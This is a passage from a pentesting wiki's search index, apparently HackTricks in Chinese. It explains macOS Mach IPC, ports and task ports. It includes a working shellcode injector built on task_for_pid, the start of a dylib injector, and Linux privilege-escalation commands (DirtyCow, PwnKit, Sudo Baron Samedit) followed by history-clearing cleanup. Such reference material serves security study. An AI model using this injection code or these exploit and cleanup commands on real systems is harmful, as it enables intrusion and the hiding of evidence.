,端口权限将直接出现在该进程中(即使它没有处理这些权限)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 一个 Mach 消息","id":"2401","title":"一个 Mach 消息"},"2402":{"body":"请注意,端口与任务命名空间相关联,因此要创建或搜索端口,还会查询任务命名空间(更多信息见mach/mach_port.h): mach_port_allocate | mach_port_construct : 创建 一个端口。 mach_port_allocate 还可以创建一个 端口集 :对一组端口的接收权限。每当接收到消息时,会指明消息来自哪个端口。 mach_port_allocate_name: 更改端口的名称(默认是32位整数) mach_port_names: 从目标获取端口名称 mach_port_type: 获取任务对名称的权限 mach_port_rename: 重命名端口(类似于FD的dup2) mach_port_allocate: 分配一个新的RECEIVE、PORT_SET或DEAD_NAME mach_port_insert_right: 在您拥有RECEIVE的端口中创建一个新权限 mach_port_... mach_msg | mach_msg_overwrite : 用于 发送和接收mach消息 的函数。覆盖版本允许为消息接收指定不同的缓冲区(另一个版本将仅重用它)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » Mac Ports APIs","id":"2402","title":"Mac Ports APIs"},"2403":{"body":"由于**mach_msg 和 mach_msg_overwrite**是用于发送和接收消息的函数,因此在它们上设置断点将允许检查发送和接收的消息。 例如,开始调试您可以调试的任何应用程序,因为它将加载**libSystem.B,该库将使用此函数**。 (lldb) b mach_msg\\nBreakpoint 1: where = libsystem_kernel.dylib`mach_msg, address = 0x00000001803f6c20\\n(lldb) r\\nProcess 71019 launched: \'/Users/carlospolop/Desktop/sandboxedapp/SandboxedShellAppDown.app/Contents/MacOS/SandboxedShellApp\' (arm64)\\nProcess 71019 stopped\\n* thread #1, queue = \'com.apple.main-thread\', stop reason = breakpoint 1.1\\nframe #0: 0x0000000181d3ac20 libsystem_kernel.dylib`mach_msg\\nlibsystem_kernel.dylib`mach_msg:\\n-> 0x181d3ac20 <+0>: pacibsp\\n0x181d3ac24 <+4>: sub sp, sp, #0x20\\n0x181d3ac28 <+8>: stp x29, x30, [sp, #0x10]\\n0x181d3ac2c <+12>: add x29, sp, #0x10\\nTarget 0: (SandboxedShellApp) stopped.\\n(lldb) bt\\n* thread #1, queue = \'com.apple.main-thread\', stop reason = breakpoint 1.1\\n* frame #0: 0x0000000181d3ac20 libsystem_kernel.dylib`mach_msg\\nframe #1: 0x0000000181ac3454 libxpc.dylib`_xpc_pipe_mach_msg + 56\\nframe #2: 0x0000000181ac2c8c libxpc.dylib`_xpc_pipe_routine + 388\\nframe #3: 0x0000000181a9a710 libxpc.dylib`_xpc_interface_routine + 208\\nframe #4: 0x0000000181abbe24 libxpc.dylib`_xpc_init_pid_domain + 348\\nframe #5: 0x0000000181abb398 libxpc.dylib`_xpc_uncork_pid_domain_locked + 76\\nframe #6: 0x0000000181abbbfc libxpc.dylib`_xpc_early_init + 92\\nframe #7: 0x0000000181a9583c libxpc.dylib`_libxpc_initializer + 1104\\nframe #8: 0x000000018e59e6ac libSystem.B.dylib`libSystem_initializer + 236\\nframe #9: 0x0000000181a1d5c8 dyld`invocation function for block in dyld4::Loader::findAndRunAllInitializers(dyld4::RuntimeState&) const::$_0::operator()() const + 168 要获取**mach_msg**的参数,请检查寄存器。这些是参数(来自 mach/message.h ): c __WATCHOS_PROHIBITED __TVOS_PROHIBITED\\nextern mach_msg_return_t mach_msg(\\nmach_msg_header_t *msg,\\nmach_msg_option_t option,\\nmach_msg_size_t send_size,\\nmach_msg_size_t rcv_size,\\nmach_port_name_t rcv_name,\\nmach_msg_timeout_t timeout,\\nmach_port_name_t notify); 从注册表中获取值: armasm reg read $x0 $x1 $x2 $x3 $x4 $x5 $x6\\nx0 = 0x0000000124e04ce8 ;mach_msg_header_t (*msg)\\nx1 = 0x0000000003114207 ;mach_msg_option_t (option)\\nx2 = 0x0000000000000388 ;mach_msg_size_t (send_size)\\nx3 = 0x0000000000000388 ;mach_msg_size_t (rcv_size)\\nx4 = 0x0000000000001f03 ;mach_port_name_t (rcv_name)\\nx5 = 0x0000000000000000 ;mach_msg_timeout_t (timeout)\\nx6 = 0x0000000000000000 ;mach_port_name_t (notify) 检查消息头,查看第一个参数: armasm (lldb) x/6w $x0\\n0x124e04ce8: 0x00131513 0x00000388 0x00000807 0x00001f03\\n0x124e04cf8: 0x00000b07 0x40000322 ; 0x00131513 -> mach_msg_bits_t (msgh_bits) = 0x13 (MACH_MSG_TYPE_COPY_SEND) in local | 0x1500 (MACH_MSG_TYPE_MAKE_SEND_ONCE) in remote | 0x130000 (MACH_MSG_TYPE_COPY_SEND) in voucher\\n; 0x00000388 -> mach_msg_size_t (msgh_size)\\n; 0x00000807 -> mach_port_t (msgh_remote_port)\\n; 0x00001f03 -> mach_port_t (msgh_local_port)\\n; 0x00000b07 -> mach_port_name_t (msgh_voucher_port)\\n; 0x40000322 -> mach_msg_id_t (msgh_id) 该类型的 mach_msg_bits_t 非常常见,允许回复。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 调试 mach_msg","id":"2403","title":"调试 mach_msg"},"2404":{"body":"bash lsmp -p sudo lsmp -p 1\\nProcess (1) : launchd\\nname ipc-object rights flags boost reqs recv send sonce oref qlimit msgcount context identifier type\\n--------- ---------- ---------- -------- ----- ---- ----- ----- ----- ---- ------ -------- ------------------ ----------- ------------\\n0x00000203 0x181c4e1d send -------- --- 2 0x00000000 TASK-CONTROL SELF (1) launchd\\n0x00000303 0x183f1f8d recv -------- 0 --- 1 N 5 0 0x0000000000000000\\n0x00000403 0x183eb9dd recv -------- 0 --- 1 N 5 0 0x0000000000000000\\n0x0000051b 0x1840cf3d send -------- --- 2 -> 6 0 0x0000000000000000 0x00011817 (380) WindowServer\\n0x00000603 0x183f698d recv -------- 0 --- 1 N 5 0 0x0000000000000000\\n0x0000070b 0x175915fd recv,send ---GS--- 0 --- 1 2 Y 5 0 0x0000000000000000\\n0x00000803 0x1758794d send -------- --- 1 0x00000000 CLOCK\\n0x0000091b 0x192c71fd send -------- D-- 1 -> 1 0 0x0000000000000000 0x00028da7 (418) runningboardd\\n0x00000a6b 0x1d4a18cd send -------- --- 2 -> 16 0 0x0000000000000000 0x00006a03 (92247) Dock\\n0x00000b03 0x175a5d4d send -------- --- 2 -> 16 0 0x0000000000000000 0x00001803 (310) logd\\n[...]\\n0x000016a7 0x192c743d recv,send --TGSI-- 0 --- 1 1 Y 16 0 0x0000000000000000\\n+ send -------- --- 1 <- 0x00002d03 (81948) seserviced\\n+ send -------- --- 1 <- 0x00002603 (74295) passd\\n[...] 名称 是分配给端口的默认名称(检查它在前3个字节中的 增加 情况)。 ipc-object 是端口的 混淆 唯一 标识符 。 还要注意,只有**send 权限的端口是 识别其所有者 的(端口名称 + pid)。 还要注意使用 + 来表示 连接到同一端口的其他任务**。 还可以使用 procesxp 查看 注册的服务名称 (由于需要com.apple.system-task-port,因此禁用SIP): procesp 1 ports 您可以通过从 http://newosxbook.com/tools/binpack64-256.tar.gz 下载此工具来安装它。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 枚举端口","id":"2404","title":"枚举端口"},"2405":{"body":"注意 sender 如何 分配 端口,为名称 org.darlinghq.example 创建 发送权限 并将其发送到 引导服务器 ,同时发送者请求该名称的 发送权限 并使用它来 发送消息 。 receiver.c\\nsender.c c // Code from https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html\\n// gcc receiver.c -o receiver #include \\n#include \\n#include int main() { // Create a new port.\\nmach_port_t port;\\nkern_return_t kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);\\nif (kr != KERN_SUCCESS) {\\nprintf(\\"mach_port_allocate() failed with code 0x%x\\\\n\\", kr);\\nreturn 1;\\n}\\nprintf(\\"mach_port_allocate() created port right name %d\\\\n\\", port); // Give us a send right to this port, in addition to the receive right.\\nkr = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);\\nif (kr != KERN_SUCCESS) {\\nprintf(\\"mach_port_insert_right() failed with code 0x%x\\\\n\\", kr);\\nreturn 1;\\n}\\nprintf(\\"mach_port_insert_right() inserted a send right\\\\n\\"); // Send the send right to the bootstrap server, so that it can be looked up by other processes.\\nkr = bootstrap_register(bootstrap_port, \\"org.darlinghq.example\\", port);\\nif (kr != KERN_SUCCESS) {\\nprintf(\\"bootstrap_register() failed with code 0x%x\\\\n\\", kr);\\nreturn 1;\\n}\\nprintf(\\"bootstrap_register()\'ed our port\\\\n\\"); // Wait for a message.\\nstruct {\\nmach_msg_header_t header;\\nchar some_text[10];\\nint some_number;\\nmach_msg_trailer_t trailer;\\n} message; kr = mach_msg(\\n&message.header, // Same as (mach_msg_header_t *) &message.\\nMACH_RCV_MSG, // Options. We\'re receiving a message.\\n0, // Size of the message being sent, if sending.\\nsizeof(message), // Size of the buffer for receiving.\\nport, // The port to receive a message on.\\nMACH_MSG_TIMEOUT_NONE,\\nMACH_PORT_NULL // Port for the kernel to send notifications about this message to.\\n);\\nif (kr != KERN_SUCCESS) {\\nprintf(\\"mach_msg() failed with code 0x%x\\\\n\\", kr);\\nreturn 1;\\n}\\nprintf(\\"Got a message\\\\n\\"); message.some_text[9] = 0;\\nprintf(\\"Text: %s, number: %d\\\\n\\", message.some_text, message.some_number);\\n} c // Code from https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html\\n// gcc sender.c -o sender #include \\n#include \\n#include int main() { // Lookup the receiver port using the bootstrap server.\\nmach_port_t port;\\nkern_return_t kr = bootstrap_look_up(bootstrap_port, \\"org.darlinghq.example\\", &port);\\nif (kr != KERN_SUCCESS) {\\nprintf(\\"bootstrap_look_up() failed with code 0x%x\\\\n\\", kr);\\nreturn 1;\\n}\\nprintf(\\"bootstrap_look_up() returned port right name %d\\\\n\\", port); // Construct our message.\\nstruct {\\nmach_msg_header_t header;\\nchar some_text[10];\\nint some_number;\\n} message; message.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);\\nmessage.header.msgh_remote_port = port;\\nmessage.header.msgh_local_port = MACH_PORT_NULL; strncpy(message.some_text, \\"Hello\\", sizeof(message.some_text));\\nmessage.some_number = 35; // Send the message.\\nkr = mach_msg(\\n&message.header, // Same as (mach_msg_header_t *) &message.\\nMACH_SEND_MSG, // Options. We\'re sending a message.\\nsizeof(message), // Size of the message being sent.\\n0, // Size of the buffer for receiving.\\nMACH_PORT_NULL, // A port to receive a message on, if receiving.\\nMACH_MSG_TIMEOUT_NONE,\\nMACH_PORT_NULL // Port for the kernel to send notifications about this message to.\\n);\\nif (kr != KERN_SUCCESS) {\\nprintf(\\"mach_msg() failed with code 0x%x\\\\n\\", kr);\\nreturn 1;\\n}\\nprintf(\\"Sent a message\\\\n\\");\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 代码示例","id":"2405","title":"代码示例"},"2406":{"body":"有一些特殊端口允许在任务拥有 SEND 权限的情况下 执行某些敏感操作或访问某些敏感数据 。这使得这些端口从攻击者的角度来看非常有趣,不仅因为其能力,还因为可以 在任务之间共享SEND权限 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 特权端口","id":"2406","title":"特权端口"},"2407":{"body":"这些端口由一个数字表示。 SEND 权限可以通过调用 host_get_special_port 获得,而 RECEIVE 权限则通过调用 host_set_special_port 获得。然而,这两个调用都需要 host_priv 端口,只有root可以访问。此外,过去root能够调用 host_set_special_port 并劫持任意端口,例如通过劫持 HOST_KEXTD_PORT 来绕过代码签名(SIP现在防止了这种情况)。 这些端口分为两组: 前7个端口由内核拥有 ,分别是 1 HOST_PORT,2 HOST_PRIV_PORT,3 HOST_IO_MASTER_PORT,7 是 HOST_MAX_SPECIAL_KERNEL_PORT。 从数字 8 开始的端口是 由系统守护进程拥有 ,可以在 host_special_ports.h 中找到声明。 主机端口 :如果一个进程对这个端口拥有 SEND 权限,它可以通过调用其例程获取 系统 的信息,例如: host_processor_info: 获取处理器信息 host_info: 获取主机信息 host_virtual_physical_table_info: 虚拟/物理页表(需要 MACH_VMDEBUG) host_statistics: 获取主机统计信息 mach_memory_info: 获取内核内存布局 主机特权端口 :一个对这个端口拥有 SEND 权限的进程可以执行 特权操作 ,例如显示启动数据或尝试加载内核扩展。 进程需要是root 才能获得此权限。 此外,为了调用 kext_request API,需要拥有其他权限 com.apple.private.kext* ,这些权限仅授予Apple二进制文件。 可以调用的其他例程包括: host_get_boot_info: 获取 machine_boot_info() host_priv_statistics: 获取特权统计信息 vm_allocate_cpm: 分配连续物理内存 host_processors: 发送权限到主机处理器 mach_vm_wire: 使内存常驻 由于 root 可以访问此权限,它可以调用 host_set_[special/exception]_port[s] 来 劫持主机特殊或异常端口 。 可以通过运行以下命令 查看所有主机特殊端口 : bash procexp all ports | grep \\"HSP\\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 主机特殊端口","id":"2407","title":"主机特殊端口"},"2408":{"body":"这些端口是为知名服务保留的。可以通过调用 task_[get/set]_special_port 来获取/设置它们。它们可以在 task_special_ports.h 中找到: c typedef\\tint\\ttask_special_port_t; #define TASK_KERNEL_PORT\\t1\\t/* Represents task to the outside\\nworld.*/\\n#define TASK_HOST_PORT 2\\t/* The host (priv) port for task. */\\n#define TASK_BOOTSTRAP_PORT\\t4\\t/* Bootstrap environment for task. */\\n#define TASK_WIRED_LEDGER_PORT\\t5\\t/* Wired resource ledger for task. */\\n#define TASK_PAGED_LEDGER_PORT\\t6\\t/* Paged resource ledger for task. */ 从 这里 : TASK_KERNEL_PORT [task-self send right]:用于控制此任务的端口。用于发送影响任务的消息。这是由**mach_task_self(见下文的任务端口)**返回的端口。 TASK_BOOTSTRAP_PORT [bootstrap send right]:任务的引导端口。用于发送请求返回其他系统服务端口的消息。 TASK_HOST_NAME_PORT [host-self send right]:用于请求包含主机信息的端口。这是由 mach_host_self 返回的端口。 TASK_WIRED_LEDGER_PORT [ledger send right]:命名此任务从中提取其有线内核内存的源的端口。 TASK_PAGED_LEDGER_PORT [ledger send right]:命名此任务从中提取其默认内存管理内存的源的端口。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 任务特殊端口","id":"2408","title":"任务特殊端口"},"2409":{"body":"最初,Mach没有“进程”,它有“任务”,被认为更像是线程的容器。当Mach与BSD合并时, 每个任务与一个BSD进程相关联 。因此,每个BSD进程都有其作为进程所需的详细信息,每个Mach任务也有其内部工作(除了不存在的pid 0,即kernel_task)。 与此相关的有两个非常有趣的函数: task_for_pid(target_task_port, pid, &task_port_of_pid):获取与指定的pid相关的任务的任务端口的SEND权限,并将其授予指定的target_task_port(通常是使用mach_task_self()的调用任务,但也可以是不同任务上的SEND端口。) pid_for_task(task, &pid):给定一个任务的SEND权限,查找该任务相关的PID。 为了在任务内执行操作,任务需要对自己调用mach_task_self()的SEND权限(使用task_self_trap(28))。有了这个权限,任务可以执行多个操作,例如: task_threads:获取任务线程的所有任务端口的SEND权限 task_info:获取任务信息 task_suspend/resume:挂起或恢复任务 task_[get/set]_special_port thread_create:创建线程 task_[get/set]_state:控制任务状态 更多内容可以在 mach/task.h 中找到 caution 请注意,拥有对 不同任务 的任务端口的SEND权限,可以对不同任务执行此类操作。 此外,task_port也是**vm_map 端口,允许使用vm_read()和vm_write()等函数 读取和操作 任务内的内存。这基本上意味着,拥有对不同任务的task_port的SEND权限的任务将能够 注入代码到该任务中**。 请记住,因为 内核也是一个任务 ,如果有人设法获得对**kernel_task 的 SEND权限**,它将能够使内核执行任何操作(越狱)。 调用mach_task_self()以 获取此端口的名称 ,用于调用任务。此端口仅在**exec() 中 继承**;使用fork()创建的新任务会获得一个新的任务端口(作为特例,任务在suid二进制文件的exec()后也会获得一个新的任务端口)。生成任务并获取其端口的唯一方法是执行 \\"port swap dance\\" 同时进行fork()。 访问端口的限制如下(来自二进制文件AppleMobileFileIntegrity的macos_task_policy): 如果应用程序具有**com.apple.security.get-task-allow权限**,则来自 同一用户的进程可以访问任务端口 (通常由Xcode为调试添加)。 公证 过程不允许其用于生产版本。 具有**com.apple.system-task-ports 权限的应用程序可以获取 任何 进程的任务端口,除了内核。在旧版本中称为 task_for_pid-allow**。这仅授予Apple应用程序。 Root可以访问未使用 硬化 运行时编译的应用程序的任务端口(且不是来自Apple的)。 任务名称端口: 一个未特权版本的_task port_。它引用任务,但不允许控制它。通过它似乎唯一可用的功能是task_info()。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 任务端口","id":"2409","title":"任务端口"},"241":{"body":"bash # DirtyCow – CVE-2016-5195\\ngcc -pthread dirty.c -o dirty && ./dirty /etc/passwd # PwnKit – CVE-2021-4034\\npython3 PwnKit.py # Sudo Baron Samedit – CVE-2021-3156\\npython3 exploit_userspec.py 清理提示: bash userdel firefart 2>/dev/null\\nrm -f /tmp/sh ; history -c","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 7. 在遗留 NE 上的权限提升","id":"241","title":"7. 在遗留 NE 上的权限提升"},"2410":{"body":"线程也有相关的端口,可以从调用**task_threads**的任务和使用processor_set_threads的处理器中看到。对线程端口的SEND权限允许使用来自thread_act子系统的函数,例如: thread_terminate thread_[get/set]_state act_[get/set]_state thread_[suspend/resume] thread_info ... 任何线程都可以通过调用**mach_thread_sef**获取此端口。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 线程端口","id":"2410","title":"线程端口"},"2411":{"body":"您可以从以下位置获取Shellcode: Introduction to ARM64v8 mysleep.m\\nentitlements.plist objectivec // clang -framework Foundation mysleep.m -o mysleep\\n// codesign --entitlements entitlements.plist -s - mysleep #import double performMathOperations() {\\ndouble result = 0;\\nfor (int i = 0; i < 10000; i++) {\\nresult += sqrt(i) * tan(i) - cos(i);\\n}\\nreturn result;\\n} int main(int argc, const char * argv[]) {\\n@autoreleasepool {\\nNSLog(@\\"Process ID: %d\\", [[NSProcessInfo processInfo]\\nprocessIdentifier]);\\nwhile (true) {\\n[NSThread sleepForTimeInterval:5]; performMathOperations(); // Silent action [NSThread sleepForTimeInterval:5];\\n}\\n}\\nreturn 0;\\n} xml \\n\\n\\ncom.apple.security.get-task-allow\\n\\n\\n 编译 之前的程序并添加 权限 以便能够以相同用户注入代码(如果不这样做,您将需要使用 sudo )。 sc_injector.m\\nobjectivec // gcc -framework Foundation -framework Appkit sc_injector.m -o sc_injector\\n// Based on https://gist.github.com/knightsc/45edfc4903a9d2fa9f5905f60b02ce5a?permalink_comment_id=2981669\\n// and on https://newosxbook.com/src.jl?tree=listings&file=inject.c #import \\n#import \\n#include \\n#include #ifdef __arm64__ kern_return_t mach_vm_allocate\\n(\\nvm_map_t target,\\nmach_vm_address_t *address,\\nmach_vm_size_t size,\\nint flags\\n); kern_return_t mach_vm_write\\n(\\nvm_map_t target_task,\\nmach_vm_address_t address,\\nvm_offset_t data,\\nmach_msg_type_number_t dataCnt\\n); #else\\n#include \\n#endif #define STACK_SIZE 65536\\n#define CODE_SIZE 128 // ARM64 shellcode that executes touch /tmp/lalala\\nchar injectedCode[] = \\"\\\\xff\\\\x03\\\\x01\\\\xd1\\\\xe1\\\\x03\\\\x00\\\\x91\\\\x60\\\\x01\\\\x00\\\\x10\\\\x20\\\\x00\\\\x00\\\\xf9\\\\x60\\\\x01\\\\x00\\\\x10\\\\x20\\\\x04\\\\x00\\\\xf9\\\\x40\\\\x01\\\\x00\\\\x10\\\\x20\\\\x08\\\\x00\\\\xf9\\\\x3f\\\\x0c\\\\x00\\\\xf9\\\\x80\\\\x00\\\\x00\\\\x10\\\\xe2\\\\x03\\\\x1f\\\\xaa\\\\x70\\\\x07\\\\x80\\\\xd2\\\\x01\\\\x00\\\\x00\\\\xd4\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x73\\\\x68\\\\x00\\\\x2d\\\\x63\\\\x00\\\\x00\\\\x74\\\\x6f\\\\x75\\\\x63\\\\x68\\\\x20\\\\x2f\\\\x74\\\\x6d\\\\x70\\\\x2f\\\\x6c\\\\x61\\\\x6c\\\\x61\\\\x6c\\\\x61\\\\x00\\"; int inject(pid_t pid){ task_t remoteTask; // Get access to the task port of the process we want to inject into\\nkern_return_t kr = task_for_pid(mach_task_self(), pid, &remoteTask);\\nif (kr != KERN_SUCCESS) {\\nfprintf (stderr, \\"Unable to call task_for_pid on pid %d: %d. Cannot continue!\\\\n\\",pid, kr);\\nreturn (-1);\\n}\\nelse{\\nprintf(\\"Gathered privileges over the task port of process: %d\\\\n\\", pid);\\n} // Allocate memory for the stack\\nmach_vm_address_t remoteStack64 = (vm_address_t) NULL;\\nmach_vm_address_t remoteCode64 = (vm_address_t) NULL;\\nkr = mach_vm_allocate(remoteTask, &remoteStack64, STACK_SIZE, VM_FLAGS_ANYWHERE); if (kr != KERN_SUCCESS)\\n{\\nfprintf(stderr,\\"Unable to allocate memory for remote stack in thread: Error %s\\\\n\\", mach_error_string(kr));\\nreturn (-2);\\n}\\nelse\\n{ fprintf (stderr, \\"Allocated remote stack @0x%llx\\\\n\\", remoteStack64);\\n} // Allocate memory for the code\\nremoteCode64 = (vm_address_t) NULL;\\nkr = mach_vm_allocate( remoteTask, &remoteCode64, CODE_SIZE, VM_FLAGS_ANYWHERE ); if (kr != KERN_SUCCESS)\\n{\\nfprintf(stderr,\\"Unable to allocate memory for remote code in thread: Error %s\\\\n\\", mach_error_string(kr));\\nreturn (-2);\\n} // Write the shellcode to the allocated memory\\nkr = mach_vm_write(remoteTask, // Task port\\nremoteCode64, // Virtual Address (Destination)\\n(vm_address_t) injectedCode, // Source\\n0xa9); // Length of the source if (kr != KERN_SUCCESS)\\n{\\nfprintf(stderr,\\"Unable to write remote thread memory: Error %s\\\\n\\", mach_error_string(kr));\\nreturn (-3);\\n} // Set the permissions on the allocated code memory\\nkr = vm_protect(remoteTask, remoteCode64, 0x70, FALSE, VM_PROT_READ | VM_PROT_EXECUTE); if (kr != KERN_SUCCESS)\\n{\\nfprintf(stderr,\\"Unable to set memory permissions for remote thread\'s code: Error %s\\\\n\\", mach_error_string(kr));\\nreturn (-4);\\n} // Set the permissions on the allocated stack memory\\nkr = vm_protect(remoteTask, remoteStack64, STACK_SIZE, TRUE, VM_PROT_READ | VM_PROT_WRITE); if (kr != KERN_SUCCESS)\\n{\\nfprintf(stderr,\\"Unable to set memory permissions for remote thread\'s stack: Error %s\\\\n\\", mach_error_string(kr));\\nreturn (-4);\\n} // Create thread to run shellcode\\nstruct arm_unified_thread_state remoteThreadState64;\\nthread_act_t remoteThread; memset(&remoteThreadState64, \'\\\\0\', sizeof(remoteThreadState64) ); remoteStack64 += (STACK_SIZE / 2); // this is the real stack\\n//remoteStack64 -= 8; // need alignment of 16 const char* p = (const char*) remoteCode64; remoteThreadState64.ash.flavor = ARM_THREAD_STATE64;\\nremoteThreadState64.ash.count = ARM_THREAD_STATE64_COUNT;\\nremoteThreadState64.ts_64.__pc = (u_int64_t) remoteCode64;\\nremoteThreadState64.ts_64.__sp = (u_int64_t) remoteStack64; printf (\\"Remote Stack 64 0x%llx, Remote code is %p\\\\n\\", remoteStack64, p ); kr = thread_create_running(remoteTask, ARM_THREAD_STATE64, // ARM_THREAD_STATE64,\\n(thread_state_t) &remoteThreadState64.ts_64, ARM_THREAD_STATE64_COUNT , &remoteThread ); if (kr != KERN_SUCCESS) {\\nfprintf(stderr,\\"Unable to create remote thread: error %s\\", mach_error_string (kr));\\nreturn (-3);\\n} return (0);\\n} pid_t pidForProcessName(NSString *processName) {\\nNSArray *arguments = @[@\\"pgrep\\", processName];\\nNSTask *task = [[NSTask alloc] init];\\n[task setLaunchPath:@\\"/usr/bin/env\\"];\\n[task setArguments:arguments]; NSPipe *pipe = [NSPipe pipe];\\n[task setStandardOutput:pipe]; NSFileHandle *file = [pipe fileHandleForReading]; [task launch]; NSData *data = [file readDataToEndOfFile];\\nNSString *string = [[NSString alloc] initWithData:data encoding:NSUTF8StringEncoding]; return (pid_t)[string integerValue];\\n} BOOL isStringNumeric(NSString *str) {\\nNSCharacterSet* nonNumbers = [[NSCharacterSet decimalDigitCharacterSet] invertedSet];\\nNSRange r = [str rangeOfCharacterFromSet: nonNumbers];\\nreturn r.location == NSNotFound;\\n} int main(int argc, const char * argv[]) {\\n@autoreleasepool {\\nif (argc < 2) {\\nNSLog(@\\"Usage: %s \\", argv[0]);\\nreturn 1;\\n} NSString *arg = [NSString stringWithUTF8String:argv[1]];\\npid_t pid; if (isStringNumeric(arg)) {\\npid = [arg intValue];\\n} else {\\npid = pidForProcessName(arg);\\nif (pid == 0) {\\nNSLog(@\\"Error: Process named \'%@\' not found.\\", arg);\\nreturn 1;\\n}\\nelse{\\nprintf(\\"Found PID of process \'%s\': %d\\\\n\\", [arg UTF8String], pid);\\n}\\n} inject(pid);\\n} return 0;\\n} bash gcc -framework Foundation -framework Appkit sc_inject.m -o sc_inject\\n./inject tip 要使其在 iOS 上工作,您需要权限 dynamic-codesigning 以便能够创建可写的内存可执行文件。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 通过任务端口在线程中注入Shellcode","id":"2411","title":"通过任务端口在线程中注入Shellcode"},"2412":{"body":"在 macOS 中, 线程 可以通过 Mach 或使用 posix pthread api 进行操作。我们在之前的注入中生成的线程是使用 Mach api 生成的,因此 它不符合 posix 标准 。 能够 注入一个简单的 shellcode 来执行命令是因为它 不需要与 posix 兼容的 api,只需与 Mach 兼容。 更复杂的注入 将需要 线程 也 符合 posix 标准 。 因此,为了 改进线程 ,它应该调用 pthread_create_from_mach_thread ,这将 创建一个有效的 pthread 。然后,这个新的 pthread 可以 调用 dlopen 来 从系统加载一个 dylib ,因此不必编写新的 shellcode 来执行不同的操作,而是可以加载自定义库。 您可以在以下位置找到 示例 dylibs (例如,生成日志的那个,然后您可以监听它): macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES dylib_injector.m\\nobjectivec // gcc -framework Foundation -framework Appkit dylib_injector.m -o dylib_injector\\n// Based on http://newosxbook.com/src.jl?tree=listings&file=inject.c\\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include #include \\n#include #ifdef __arm64__\\n//#include \\"mach/arm/thread_status.h\\" // Apple says: mach/mach_vm.h:1:2: error: mach_vm.h unsupported\\n// And I say, bullshit.\\nkern_return_t mach_vm_allocate\\n(\\nvm_map_t target,\\nmach_vm_address_t *address,\\nmach_vm_size_t size,\\nint flags\\n); kern_return_t mach_vm_write\\n(\\nvm_map_t target_task,\\nmach_vm_address_t address,\\nvm_offset_t data,\\nmach_msg_type_number_t dataCnt\\n); #else\\n#include \\n#endif #define STACK_SIZE 65536\\n#define CODE_SIZE 128 char injectedCode[] = // \\"\\\\x00\\\\x00\\\\x20\\\\xd4\\" // BRK X0 ; // useful if you need a break :) // Call pthread_set_self \\"\\\\xff\\\\x83\\\\x00\\\\xd1\\" // SUB SP, SP, #0x20 ; Allocate 32 bytes of space on the stack for local variables\\n\\"\\\\xFD\\\\x7B\\\\x01\\\\xA9\\" // STP X29, X30, [SP, #0x10] ; Save frame pointer and link register on the stack\\n\\"\\\\xFD\\\\x43\\\\x00\\\\x91\\" // ADD X29, SP, #0x10 ; Set frame pointer to current stack pointer\\n\\"\\\\xff\\\\x43\\\\x00\\\\xd1\\" // SUB SP, SP, #0x10 ; Space for the\\n\\"\\\\xE0\\\\x03\\\\x00\\\\x91\\" // MOV X0, SP ; (arg0)Store in the stack the thread struct\\n\\"\\\\x01\\\\x00\\\\x80\\\\xd2\\" // MOVZ X1, 0 ; X1 (arg1) = 0;\\n\\"\\\\xA2\\\\x00\\\\x00\\\\x10\\" // ADR X2, 0x14 ; (arg2)12bytes from here, Address where the new thread should start\\n\\"\\\\x03\\\\x00\\\\x80\\\\xd2\\" // MOVZ X3, 0 ; X3 (arg3) = 0;\\n\\"\\\\x68\\\\x01\\\\x00\\\\x58\\" // LDR X8, #44 ; load address of PTHRDCRT (pthread_create_from_mach_thread)\\n\\"\\\\x00\\\\x01\\\\x3f\\\\xd6\\" // BLR X8 ; call pthread_create_from_mach_thread\\n\\"\\\\x00\\\\x00\\\\x00\\\\x14\\" // loop: b loop ; loop forever // Call dlopen with the path to the library\\n\\"\\\\xC0\\\\x01\\\\x00\\\\x10\\" // ADR X0, #56 ; X0 => \\"LIBLIBLIB...\\";\\n\\"\\\\x68\\\\x01\\\\x00\\\\x58\\" // LDR X8, #44 ; load DLOPEN\\n\\"\\\\x01\\\\x00\\\\x80\\\\xd2\\" // MOVZ X1, 0 ; X1 = 0;\\n\\"\\\\x29\\\\x01\\\\x00\\\\x91\\" // ADD x9, x9, 0 - I left this as a nop\\n\\"\\\\x00\\\\x01\\\\x3f\\\\xd6\\" // BLR X8 ; do dlopen() // Call pthread_exit\\n\\"\\\\xA8\\\\x00\\\\x00\\\\x58\\" // LDR X8, #20 ; load PTHREADEXT\\n\\"\\\\x00\\\\x00\\\\x80\\\\xd2\\" // MOVZ X0, 0 ; X1 = 0;\\n\\"\\\\x00\\\\x01\\\\x3f\\\\xd6\\" // BLR X8 ; do pthread_exit \\"PTHRDCRT\\" // <-\\n\\"PTHRDEXT\\" // <-\\n\\"DLOPEN__\\" // <-\\n\\"LIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIB\\"\\n\\"\\\\x00\\" \\"\\\\x00\\" \\"\\\\x00\\" 